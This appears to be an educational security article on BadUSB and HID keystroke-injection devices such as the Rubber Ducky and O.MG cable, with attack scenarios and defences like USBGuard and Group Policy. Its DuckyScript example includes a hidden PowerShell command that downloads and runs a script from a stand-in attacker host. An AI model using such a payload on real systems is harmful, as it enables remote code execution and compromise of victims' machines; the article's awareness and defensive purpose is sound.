A USB drive dropped in a parking lot. A charging cable left at a conference. A “free” flash drive in a swag bag. These are vectors for some of the most underestimated attacks in cybersecurity — BadUSB and HID-based USB attacks. No antivirus catches them. No firewall blocks them. They bypass nearly every perimeter control by impersonating trusted hardware.
What Is BadUSB?
BadUSB is a class of attacks discovered and published by Karsten Nohl and Jakob Lell at Black Hat 2014. The core insight: USB firmware can be reprogrammed. Many USB controllers have writable firmware, and there is no cryptographic signing requirement. An attacker can reflash a USB thumb drive’s controller to make it identify as a keyboard, network adapter, or any other device class — while still appearing as a normal storage drive.
When you plug in a reprogrammed drive, your computer sees a keyboard and automatically trusts it. The device then “types” commands faster than any human could, executing a payload in seconds.
Hak5 Rubber Ducky
The USB Rubber Ducky by Hak5 is the most widely known commercial HID attack tool. It is a purpose-built keystroke injection device that looks exactly like a normal USB flash drive.
How it works:
- Device is recognized as a USB HID keyboard by the target OS
- It executes a DuckyScript payload stored on its microSD card
- Keystrokes execute at machine speed — hundreds per second
DuckyScript basics:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/p.ps1')"
ENTERGUI r opens the Windows Run dialog. The payload downloads and executes a remote PowerShell script in a hidden window. Total execution time: under 3 seconds on an unlocked machine.
The Hak5 Bash Bunny takes this further — it can emulate multiple device types simultaneously (keyboard + storage + network adapter) and run more complex multi-stage payloads with Bash scripting.
O.MG Cable
The O.MG Cable (by MG, sold through Hak5) looks and functions as a normal Lightning or USB-C charging cable. Inside the connector housing is a miniature implant containing a Wi-Fi access point, a full attack toolkit, and a keystroke injection engine.
An attacker can:
- Leave it plugged in as a charging cable
- Connect to its Wi-Fi access point from up to 300 feet away
- Remotely trigger payloads, log keystrokes, or exfiltrate data
- Kill the implant to erase evidence
The cable charges devices normally and passes data, so there is no user-visible indicator of compromise. These sell for around $180 and are indistinguishable from genuine cables by appearance.
Real Attack Scenarios
Unattended computer: An attacker with 30 seconds of physical access plugs in a Rubber Ducky. The payload opens PowerShell, downloads a reverse shell, adds a scheduled task for persistence, then closes all windows. The USB is removed before the user returns.
USB drop attack: Drives are left in parking lots, elevators, or common areas with labels like “Salary Data Q1” or “Confidential.” Studies consistently show 45–98% of dropped drives are plugged in by curious employees.
Mailed USB attack: A package arrives claiming to contain a loyalty reward or promotional material. Inside is a USB device. This technique was used in a documented 2021 attack against a US hospitality company (attributed to FIN7), where USB drives were mailed with fake BestBuy and HHS branding.
Conference charging station: A malicious cable at a public charging station compromises any device plugged in. Physical USB charging stations at conferences are a known attack surface.
Defense Strategies
USBGuard on Linux
USBGuard enforces USB device policies at the kernel level. Install and configure:
sudo apt install usbguard
sudo systemctl enable --now usbguard
usbguard generate-policy > /etc/usbguard/rules.confThis whitelists currently connected devices. New devices are blocked until explicitly authorized with usbguard allow-device <id>.
Windows Group Policy
In enterprise environments, disable USB storage via Group Policy:
Computer Configuration → Administrative Templates → System → Removable Storage Access → All Removable Storage Classes: Deny all access
This blocks storage class devices but does not block HID keyboards — a fundamental limitation that Rubber Ducky exploits.
Physical USB Port Blockers
Keyed port blockers (Lindy, Smartkeeper) physically block USB-A ports. Combined with a policy preventing removal, these stop opportunistic physical attacks in server rooms and kiosks.
BIOS/UEFI USB Configuration
Disable USB boot and limit trusted USB devices in BIOS. Some enterprise systems support USB device whitelisting by Vendor ID/Product ID at the firmware level.
Employee Awareness
The simplest control: never plug in a USB device you did not purchase yourself. Train employees to report found USB devices rather than plug them in. A found drive should go to IT, not a workstation.
Detecting HID Attacks
Traditional antivirus is blind to HID attacks — the OS sees a keyboard, not malware. Detection requires:
- EDR with keystroke anomaly detection (high-speed burst typing from a new device is suspicious)
- USB event logging via Windows Event ID 2003 (device install) or Linux
udevadm monitor - Network monitoring for outbound connections following USB insertion events
USB-based attacks work precisely because they exploit trust at the hardware level. No amount of software security stops a Rubber Ducky on an unlocked computer. Physical security, port controls, and user training remain the primary defenses.